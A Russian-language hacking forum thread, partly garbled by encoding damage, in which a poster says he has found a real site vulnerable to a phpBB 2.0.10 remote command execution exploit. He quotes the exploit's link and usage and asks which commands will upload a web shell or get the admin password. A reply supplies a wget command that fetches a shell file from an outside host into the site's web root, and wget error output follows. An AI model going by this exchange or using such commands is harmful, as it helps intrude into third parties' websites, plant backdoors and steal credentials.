Вобщем нашел очень "жирный" сайт на который прошел эксплоит:


PHP:
phpBB 2.0.10 Пропустим версии � � 7 по 9,т.к.в них присутств ует те же уязвимости,что � � в phpBB 2.0.10.Цель: (1)Выполен� �е произвольных команд.Опи сание:Была выпущена так ж� � в 2002. Данная версия встр ечается намного чаще,чем � �ладшие.Но реже чем старши е=).Был произведён дефейс � �айта phpbb.com,с помощью найд� �нной уязвимости в этой в� �рсии.Описание уязвимости:� �екорректная обработка вх� �дных параметров в viewtopic.php .Exploit:http://milw0rm.com/id.php?id=647 Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]" Где [*URL] - урл сайта (например http://www.test.com), [DIR] - директория в которой нах одится форум(например /forum/ или /forum), [NUM] - номер топика (обязательн� � существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд� �*nix /threadnav7345-1-10.html)

Конечно же темы /threadnav7345-1-10.html с *nix командами уже не существует, от сюда и возникает вопрос какие команды нужно использовать что бы залить шелл или получить пароль админа и потом залить шелл ?

wget http://attacker.ru/shell.txt -O /home/www/htdocs/1.php

ну или как то так

похоже немного по другому потому что пишет:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wget: missing URL

Usage: wget [OPTION]... ...

Try `wget --help' for more options.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

а все разобрался спасибо большое ...